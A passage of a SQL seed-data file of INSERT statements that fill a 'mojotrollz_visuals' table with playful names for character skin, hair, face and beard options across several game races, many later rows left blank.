1, 1, 'Hair 2'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (1, 1, 2, 'Hair 3'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (1, 1, 3, 'Hair 4'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (1, 1, 4, 'Hair 5'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (1, 1, 5, 'Hair 6'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (1, 1, 6, 'Hair 7'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (1, 1, 7, 'Hair 8'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (1, 1, 8, 'Hair 9'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (1, 1, 9, 'Hair 10'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (1, 2, 0, 'Black'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (1, 2, 1, 'Brown'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (1, 2, 2, 'light brown'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (1, 2, 3, 'Shiny brown'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (1, 2, 4, 'golden'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (1, 2, 5, 'blondie'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (1, 2, 6, 'ash brown'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (1, 2, 7, 'time to dye ur hair'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (1, 2, 8, 'gray'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (1, 2, 9, 'very gray'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (1, 3, 0, 'Anger 1 of 10'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (1, 3, 1, 'Anger 2 of 10'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (1, 3, 2, 'Anger 3 of 10'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (1, 3, 3, 'Anger 4 of 10'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (1, 3, 4, 'Anger 5 of 10'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (1, 3, 5, 'Anger 6 of 10'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (1, 3, 6, 'Anger 7 of 10'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (1, 3, 7, 'Anger 8 of 10'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (1, 3, 8, 'Anger 9 of 10'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (1, 3, 9, 'Take a snikers!'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (1, 4, 0, 'normal dude'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (1, 4, 1, 'trendy dude'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (1, 4, 2, 'super trendy dude'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (1, 4, 3, 'look at me!'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (1, 4, 4, 'manly'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (1, 4, 5, 'general'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (1, 4, 6, 'lasy beard'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (1, 4, 7, 'mr. incredible'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (1, 4, 8, 'the office bore'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (1, 5, 0, 'black'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (1, 5, 1, 'brown'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (1, 5, 2, 'light brown'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (1, 5, 3, 'Shiny brown'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (1, 5, 4, 'golden'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (1, 5, 5, 'blondie'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (1, 5, 6, 'ash brown'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (1, 5, 7, 'time to dye ur hair'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (1, 5, 8, 'gray'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (1, 5, 9, 'very gray'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (2, 0, 0, 'dark green orxe'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (2, 0, 1, 'green orxe'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (2, 0, 2, 'neon green orxe'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (2, 0, 3, 'sickly green orxe'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (2, 0, 4, 'washed-out green orxe'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (2, 0, 5, 'yellow green orxe'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (2, 0, 6, 'turkey green orxe'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (2, 0, 7, 'blue green orxe'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (2, 0, 8, 'out of names green orxe'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (2, 0, 9, 'bad green orxe'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (2, 1, 0, 'bald orxe'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (2, 1, 1, 'the mongolian orxe'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (2, 1, 2, 'the mongo orxe'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (2, 1, 3, 'the worrior orxe'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (2, 1, 4, 'the hairy mongo orxe'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (2, 1, 5, 'nomongo orxe'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (2, 1, 6, 'extra long mongo orxe'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (2, 1, 7, 'thausand needls orxe'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (2, 1, 8, 'saw blade orxe'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (2, 2, 0, 'darkblue'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (2, 2, 1, 'braune'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (2, 2, 2, 'pink'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (2, 2, 3, 'purple'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (2, 2, 4, 'purple 2'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (2, 2, 5, 'black'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (2, 2, 6, 'gray'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (2, 2, 7, 'white'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (2, 2, 8, 'purple 3...'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (2, 2, 9, 'turkey'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (2, 3, 0, 'Orxe 1'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (2, 3, 1, 'Orxe 2'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (2, 3, 2, 'Orxe 3'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (2, 3, 3, 'Orxe 4'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (2, 3, 4, 'Orxe 5'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (2, 3, 5, 'Orxe 6'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (2, 3, 6, 'Orxe 7'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (2, 3, 7, 'Orxe 8'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (2, 3, 8, 'Orxe 9'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (2, 3, 9, 'Orxe 10'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (2, 4, 0, 'none'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (2, 4, 1, 'little to nothing'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (2, 4, 2, 'three month beard'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (2, 4, 3, 'the normal orxe!'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (2, 4, 4, 'wild an hairy'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (2, 4, 5, 'orxe tail'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (2, 4, 6, 'double orxe tail'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (2, 4, 7, 'twin orxe tail'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (2, 4, 8, 'extra long orxe tail'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (2, 4, 9, 'the unnormal orxe!'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (2, 4, 10, 'the super unnormal orxe!'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (3, 0, 0, 'paladin skin'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (3, 0, 1, 'hunter skin'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (3, 0, 2, 'prist skin'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (3, 0, 3, 'warrior skin 1'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (3, 0, 4, 'warrior skin 2'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (3, 0, 5, 'rogue skin'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (3, 0, 6, 'prist skin 2'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (3, 1, 0, 'hair?'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (3, 1, 1, 'hunter hair'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (3, 1, 2, 'paladin hair'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (3, 1, 3, 'rogue hair 2'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (3, 1, 4, 'paladin hair 2'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (3, 1, 5, 'rogue hair'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (3, 1, 6, 'hunter hair 2'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (3, 1, 7, 'prist hair'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (3, 1, 8, 'warrior hair'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (3, 1, 9, 'warrior hair 2'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (3, 2, 0, 'bronze'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (3, 2, 1, 'gold'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (3, 2, 2, 'orange'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (3, 2, 3, 'gray'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (3, 2, 4, 'brown'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (3, 2, 5, 'black'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (3, 2, 6, 'coffee brown'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (3, 2, 7, 'extra gray'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (3, 2, 8, 'dark gray'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (3, 2, 9, 'reeeeal black'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (3, 3, 0, 'ah'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (3, 3, 1, 'oh'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (3, 3, 2, 'uh'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (3, 3, 3, 'ih'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (3, 3, 4, 'aah'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (3, 3, 5, 'ooh'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (3, 3, 6, 'uuh'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (3, 3, 7, 'iih'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (3, 3, 8, 'aaah'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (3, 3, 9, 'oooh'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (3, 4, 0, 'prist beard'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (3, 4, 1, 'warrior beard'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (3, 4, 2, 'paladin beard'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (3, 4, 3, 'paladin beard 2'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (3, 4, 4, 'hunter beard'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (3, 4, 5, 'warrior beard 2'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (3, 4, 6, 'prist beard 2'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (3, 4, 7, 'hunter beard 2'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (3, 4, 8, 'warrior beard 3'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (3, 4, 9, 'rogue beard'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (4, 0, 0, 'timber'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (4, 0, 1, 'sunset timber'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (4, 0, 2, 'cool sunset timber'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (4, 0, 3, 'moon timber'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (4, 0, 4, 'full moon timber'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (4, 0, 5, 'medium timber'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (4, 0, 6, 'suny timber'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (4, 0, 7, 'sunset timber'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (4, 0, 8, 'morning timber'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (4, 0, 9, 'sun bleached timber'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (4, 1, 0, 'timber basic hair'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (4, 1, 1, 'pigtails'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (4, 1, 2, 'like basic hair, just a b'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (4, 1, 3, 'one mighty pigtail of doo'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (4, 1, 4, 'basic timber hair with a'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (4, 1, 5, 'just another pigtail...'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (4, 1, 6, 'the evil fairy'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (4, 1, 7, 'the timber tail'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (4, 1, 8, 'advanced basic hairstyle'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (4, 1, 9, 'extra long timber tail of'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (4, 2, 0, 'green'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (4, 2, 1, 'turquoise'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (4, 2, 2, 'turquoise as well'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (4, 2, 3, 'turquoise again'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (4, 2, 4, 'white'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (4, 2, 5, 'winter blue'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (4, 2, 6, 'purple'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (4, 2, 7, 'purple number 2'); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (4, 3, 0, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (4, 3, 1, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (4, 3, 2, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (4, 3, 3, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (4, 3, 4, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (4, 3, 5, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (4, 3, 6, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (4, 3, 7, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (4, 3, 8, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (4, 3, 9, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (4, 4, 0, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (4, 4, 1, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (4, 4, 2, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (4, 4, 3, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (4, 4, 4, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (4, 4, 5, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (4, 4, 6, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (4, 4, 7, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (4, 4, 8, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (4, 4, 9, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (5, 0, 0, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (5, 0, 1, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (5, 0, 2, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (5, 0, 3, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (5, 0, 4, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (5, 0, 5, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (5, 0, 6, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (5, 0, 7, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (5, 0, 8, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (5, 0, 9, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (5, 1, 0, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (5, 1, 1, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (5, 1, 2, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (5, 1, 3, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (5, 1, 4, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (5, 1, 5, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (5, 1, 6, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (5, 1, 7, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (5, 1, 8, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (5, 1, 9, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (5, 2, 0, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (5, 2, 1, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (5, 2, 2, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (5, 2, 3, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (5, 2, 4, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (5, 2, 5, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (5, 2, 6, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (5, 2, 7, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (5, 2, 8, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (5, 2, 9, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (5, 3, 0, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (5, 3, 1, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (5, 3, 2, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (5, 3, 3, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (5, 3, 4, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (5, 3, 5, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (5, 3, 6, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (5, 3, 7, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (5, 3, 8, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (5, 3, 9, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (5, 4, 0, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (5, 4, 1, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (5, 4, 2, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (5, 4, 3, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (5, 4, 4, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (5, 4, 5, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (5, 4, 6, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (5, 4, 7, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (5, 4, 8, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (5, 4, 9, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (7, 0, 0, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (7, 0, 1, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (7, 0, 2, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (7, 0, 3, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (7, 0, 4, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (7, 0, 5, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (7, 0, 6, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (7, 0, 7, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (7, 0, 8, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (7, 0, 9, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (7, 1, 0, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (7, 1, 1, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (7, 1, 2, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (7, 1, 3, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (7, 1, 4, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (7, 1, 5, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (7, 1, 6, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (7, 1, 7, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (7, 1, 8, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (7, 1, 9, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (7, 2, 0, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (7, 2, 1, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (7, 2, 2, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (7, 2, 3, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (7, 2, 4, ''); INSERT INTO `mojotrollz_visuals` (`race`, `type`, `id`, `name`) VALUES (7, 2, 5, ''); 